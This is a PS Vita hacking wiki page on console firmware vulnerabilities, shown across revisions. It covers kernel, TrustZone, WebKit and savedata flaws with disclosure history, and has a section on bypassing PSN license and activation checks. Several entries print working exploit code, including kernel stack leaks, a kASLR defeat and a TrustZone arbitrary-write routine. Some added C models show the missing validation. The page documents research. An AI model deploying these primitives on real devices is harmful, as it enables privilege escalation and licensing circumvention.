sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 is not bounds-checked, so it indexes past the end of the syscall table and causes an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available, instead of returning NULL it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang="c"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be XORed, or SCE_NGS_ERROR_INVALID will be returned by sceNgsRackGetRequiredMemorySize.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME value makes finding the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 // value specific to firmware 1.692<br />
<br />
SceInt32 gRet = 0; // last return code, kept for debugging<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    // fake voice definition, left behind on the kernel stack by sceIoDevctl<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, sizeof(voiceDef));<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2 * 1000 * 1000);<br />
<br />
    // probe one page at a time (address not XORed, see the note above):<br />
    // every address that does not hold the planted definition is rejected<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition *)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        return addr - DEVCTL_STACK_FRAME; // kernel stack base<br />
    }<br />
    return 0xFFFFFFFF; // not found<br />
}<br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two following bugs are exploited by calling memcpy with a negative length, which gives an out-of-bounds access without copying an excessively large buffer or triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, adding it to dst yields a value smaller than dst due to integer overflow. As a consequence, the comparison later in the code evaluates to false, no matter whether it is a signed or unsigned comparison, and memcpy believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization: the eMMC MBR can be modified to change the block size. Yifan tried to exploit it via an adjacent malloc(controlled_size), couldn't find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz finds a way to exploit the buffer overflow. He discovers a logic flaw related to error code propagation in NSBL: a function does not check an error return; if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was written is used in a separate call.<br />
<br />
This allows a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F reads 0x08 bytes from <code>(tz_addr + 0x28)</code> and returns them at <code>(shared_mem_base_addr + index * 0x80)</code>, which translates to an arbitrary TrustZone memory read (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code>, it is also possible to write the leaked data to an arbitrary TrustZone memory location.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size 0x5000 bytes) and the Secure Kernel sees the exact same region at <code>0x00560000</code>, so data can be planted in the Non-secure Kernel's view of the region and the SMC made to copy it somewhere into TrustZone memory (e.g. the SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched somewhere after 1.80 and before 2.10.<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg here].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
#include <stdint.h><br />
#include <string.h><br />
<br />
// Plants 8 bytes in the Non-secure view of the shared memory region (0x00400000 + 0x28)<br />
// and has SMC 0x12F copy them to dst, which is given in the Secure view (0x00560000).<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    uintptr_t sm_handle = 0x00560000 >> 1;                    // tz_addr >> 1 encoding<br />
    uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;   // block index, unchecked<br />
<br />
    asm volatile(<br />
        "mov r0, %0\n\t"<br />
        "mov r1, %1\n\t"<br />
        "mov r12, #0x12F\n\t"<br />
        "smc #0\n\t"<br />
        : : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
    );<br />
}<br />
</source><br />
<br />
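As an added example, not part of the original page or of the Vita monitor code, the following C model shows the argument validation SMC 0x12F should have performed; the shared-memory geometry (0x00560000, 0x5000 bytes, 0x80-byte blocks, the <code>tz_addr >> 1</code> handle encoding) is taken from the text above, while the SM handle table base, size and entry size are hypothetical placeholders:<br />
<br />
```c
#include <stdbool.h>
#include <stdint.h>

/* Constructed model of the argument validation SMC 0x12F lacked; this is not
   the Vita monitor's code. Shared-memory geometry is from the text above;
   the SM handle table bounds below are hypothetical placeholders. */

#define SHM_SECURE_BASE 0x00560000u   /* Secure Kernel view of shared memory */
#define SHM_SIZE        0x5000u       /* region size */
#define SHM_BLOCK_SIZE  0x80u         /* one status block per index */
#define SHM_BLOCKS      (SHM_SIZE / SHM_BLOCK_SIZE)   /* 0xA0 valid indices */

#define SM_TABLE_BASE   0x00500000u   /* placeholder: where legitimate handles live */
#define SM_TABLE_SIZE   0x1000u       /* placeholder */
#define SM_ENTRY_SIZE   0x40u         /* placeholder; covers the 8-byte read at +0x28 */

/* Block address the SMC derives from shared_mem_index, as described above. */
uint32_t shm_block_addr(uint32_t shared_mem_index)
{
    return SHM_SECURE_BASE + shared_mem_index * SHM_BLOCK_SIZE;
}

/* An index past the region turns the status write into a write anywhere in
   TrustZone memory, so it must stay below SHM_BLOCKS. */
bool shm_index_ok(uint32_t shared_mem_index)
{
    return shared_mem_index < SHM_BLOCKS;
}

/* sm_handle encodes (tz_addr >> 1); decode it and require that the entry lies
   inside the handle table on an entry boundary, otherwise the read at +0x28
   becomes an 8-byte leak of arbitrary TrustZone memory. */
bool sm_handle_ok(uint32_t sm_handle)
{
    if (sm_handle > 0x7FFFFFFFu) return false;   /* would not fit a 32-bit address */
    uint32_t tz_addr = sm_handle << 1;
    if (tz_addr < SM_TABLE_BASE) return false;
    uint32_t off = tz_addr - SM_TABLE_BASE;
    if (off % SM_ENTRY_SIZE != 0) return false;
    return off + SM_ENTRY_SIZE <= SM_TABLE_SIZE;
}

/* Both checks before any memory access; the original handler did neither. */
bool smc_12f_args_ok(uint32_t sm_handle, uint32_t shared_mem_index)
{
    return sm_handle_ok(sm_handle) && shm_index_ok(shared_mem_index);
}
```
With these checks the handle used in the snippet above (the shared region itself, <code>0x00560000 >> 1</code>) is rejected because it does not point into the handle table.<br />
<br />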
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The DMAC5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys by brute force.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) F00D secure_kernel module loading does not check the source address and therefore provides an oracle that allows a memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== moth exploit ===<br />
<br />
(2019-02-05) To be disclosed.<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10563Vulnerabilities2019-02-02T21:55:10Z<p>Xyz: /* Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz so that HENkaku could be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup]<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref>, using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, the trailing array items are written outside the "m_storage->m_vector[]" buffer, which leads to heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
Discovered by xyz. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (it can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any other) resource-based hack just as difficult as an unsigned code execution hack (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes the callback as <code>SecurityCritical</code>, allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature,<ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
    public class AppMain<br />
    {<br />
        [SecurityCritical]<br />
        public static void Escalate(IAsyncResult result)<br />
        {<br />
            Console.WriteLine("Should be SecurityCritical");<br />
            IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
            Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
        }<br />
<br />
        public static void Main(string[] args)<br />
        {<br />
            Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
            Network.AuthGetTicket();<br />
            NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
            IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
            while (!result.IsCompleted)<br />
            {<br />
                Console.WriteLine("waiting...");<br />
            }<br />
            Console.WriteLine("Completed!");<br />
        }<br />
    }<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFloW. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or hardly so).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it uses a gamesave exploit. The reason is that from firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevents loading additional sysmodules. This limitation matters because loading sysmodules was the only way to reach more syscalls than the browser itself uses: syscall numbers are randomized at boot and only assigned to syscall slots if some user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason a gamesave exploit is possible on such a system is that games developed with SDK 2.60 and lower were compiled as statically linked executables, so their load address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also do not have stack protection enabled by default, which means that if we can smash the stack in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings and hoping you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
The Bittersmile game was found exploitable on 2018-02-17 by Freakler. The bug was implemented by TheFloW in h-encore.<br />
<br />
The bug lies in the parser of the Bittersmile game. The gamesave is actually a text file; the game reads it line by line and copies each line into one of a list of buffers. However, it does not validate the length, so if the \n delimiter is placed far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute a ROP chain. However, it is in the data section; luckily, the content after the buffer is the list holding the destinations for the other lines. This means that by overflowing into the list and redirecting the buffer pointer, the next line can be copied to wherever we want, which gives us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
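As an added example (constructed, not the Bittersmile game's code), this C parser reads the same newline-delimited save format into fixed-size slots but checks each line against the slot size before copying, so an overlong line is rejected instead of overflowing into the destination table that sits after the buffers; the slot size, slot count and sample save text are assumptions:<br />
<br />
```c
#include <stddef.h>
#include <string.h>

/* Constructed model (not the Bittersmile game's parser) of the save format
   described above: a text file read line by line, each line copied into one
   of a list of fixed-size buffers, with a destination table next to them.
   The slot size and count are assumptions. The game's parser skipped the
   length check; this version rejects a line that would not fit. */

#define LINE_SLOT_SIZE 32   /* assumed per-line buffer size, including NUL */
#define MAX_LINES      8    /* assumed number of line buffers */

struct save_lines {
    char  slot[MAX_LINES][LINE_SLOT_SIZE];  /* the line buffers */
    char *dest[MAX_LINES];                  /* where each line is written; in the
                                               real layout this table sat right
                                               after the buffer being overflowed */
};

/* Returns the number of lines parsed, or -1 if a line does not fit its slot
   or there are more lines than slots. The last line may lack a trailing '\n'. */
int parse_save_text(const char *text, size_t text_len, struct save_lines *out)
{
    size_t n = 0;
    for (size_t i = 0; i < MAX_LINES; i++) {
        out->dest[i] = out->slot[i];
    }
    const char *p = text;
    const char *end = text + text_len;
    while (p < end) {
        const char *nl = memchr(p, '\n', (size_t)(end - p));
        size_t len = nl ? (size_t)(nl - p) : (size_t)(end - p);
        if (n >= MAX_LINES) {
            return -1;                       /* more lines than buffers */
        }
        if (len >= LINE_SLOT_SIZE) {
            return -1;                       /* the missing check: line longer than its slot */
        }
        memcpy(out->dest[n], p, len);        /* bounded, so dest[] can never be reached */
        out->dest[n][len] = '\0';
        n++;
        p = nl ? nl + 1 : end;
    }
    return (int)n;
}

/* Constructed sample save exercising the normal path. */
int parse_sample(struct save_lines *out)
{
    static const char sample[] = "NAME=Player\nSTAGE=3\nFLAGS=7";
    return parse_save_text(sample, sizeof sample - 1, out);
}
```
<br />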
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can secure the PSVita store as much as they want: we will always be able to activate as long as the PS3 store is not secured.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from the PSVita to PSN for content and PSN account activations is no longer checked server-side.<br />
<br />
This means that to activate a PSVita, we only have to spoof the firmware version (to bypass the FW update popup) and spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm are no longer needed.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer, with 0x66's<br />
char outbuf[0x400];<br />
memset(outbuf, 0x066, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate kernel stack<br />
<br />
// and now, let's get the stack back and check if our data was actually written there..<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works from WebKit, not from an fself or a game.<br />
<br />
Call some functions of interest in a kernel context (some syscalls, for example sceIoOpen).<br />
Then call devctl and get up to 0x3FF bytes of that kernel stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 can index past the end of the syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in the range (0x80, 0x1000], it uses the SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available, instead of returning NULL it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang="c"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
    socket,<br />
    11,<br />
    flags_,<br />
    mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
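As an added example that is not SceNetPs code, the following C model reproduces the sequence described above (socket lookup, lock released inside a blocking malloc, concurrent close, then the vtable call) and shows the reference-counting discipline that keeps the socket allocated until the handler is done with it; the structure, function names and return codes are constructed:<br />
<br />
```c
#include <stdbool.h>
#include <stdlib.h>

/* Constructed model (not SceNetPs code) of the hazard described above: the
   handler looks up its socket under the global lock, then calls a blocking
   allocator that releases that lock while it waits, so another thread can
   close the socket before the handler resumes and calls through the vtable.
   The mitigation modelled here is a reference taken before the lock is
   dropped: close() only marks the socket dead, and the last reference frees
   it, so the handler never touches freed memory. */

struct net_socket {
    int  refcount;   /* socket table reference + in-flight handlers */
    bool closed;     /* set by close(); storage lives until refcount hits 0 */
};

static int g_freed_objects = 0;   /* model bookkeeping: real frees performed */

int freed_count(void) { return g_freed_objects; }

struct net_socket *socket_new(void)
{
    struct net_socket *s = calloc(1, sizeof *s);
    if (s) s->refcount = 1;            /* the socket table's reference */
    return s;
}

static void socket_release(struct net_socket *s)
{
    if (--s->refcount == 0) {
        g_freed_objects++;
        free(s);
    }
}

/* Taken under the lock, before the handler may block. */
struct net_socket *socket_get(struct net_socket *s)
{
    if (s->closed) return NULL;
    s->refcount++;
    return s;
}

/* What the other thread does while the handler waits inside malloc. */
void socket_close(struct net_socket *s)
{
    s->closed = true;
    socket_release(s);                 /* drops only the table's reference */
}

/* Models the ioctl path: lookup, blocking malloc with the lock released,
   an optional concurrent close, then the post-wait check that stands in for
   the vtable call. Returns 0 if it ran on a live socket, -1 if it observed
   the close and bailed out, -2 if a socket was freed while it waited. */
int ioctl_model(struct net_socket *s, bool close_during_wait)
{
    int freed_at_entry = g_freed_objects;
    struct net_socket *ref = socket_get(s);
    if (!ref) return -1;
    /* lock released here; malloc(memsz, 0) waits on the semaphore */
    if (close_during_wait) socket_close(s);
    /* lock reacquired; allocation returned */
    if (g_freed_objects != freed_at_entry) return -2;   /* the UAF; prevented by the held ref */
    int rc = ref->closed ? -1 : 0;
    socket_release(ref);               /* last reference frees a closed socket */
    return rc;
}

/* Runs one scenario on a fresh socket and tears it down. */
int run_scenario(bool close_during_wait)
{
    struct net_socket *s = socket_new();
    if (!s) return -3;
    int rc = ioctl_model(s, close_during_wait);
    if (!close_during_wait) socket_close(s);   /* normal teardown */
    return rc;
}
```
<br />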
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched in 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
    uint32_t info[0x12];<br />
<br />
    // 1) Call a function that writes sp to kernel stack<br />
    sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
    // 2) Leak kernel stack<br />
    sceMotionDevGetEvaInfo(info);<br />
<br />
    // 3) Get sysmem base<br />
    uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
    return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See the full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (XORed with a known static value) from the user.<br />
<br />
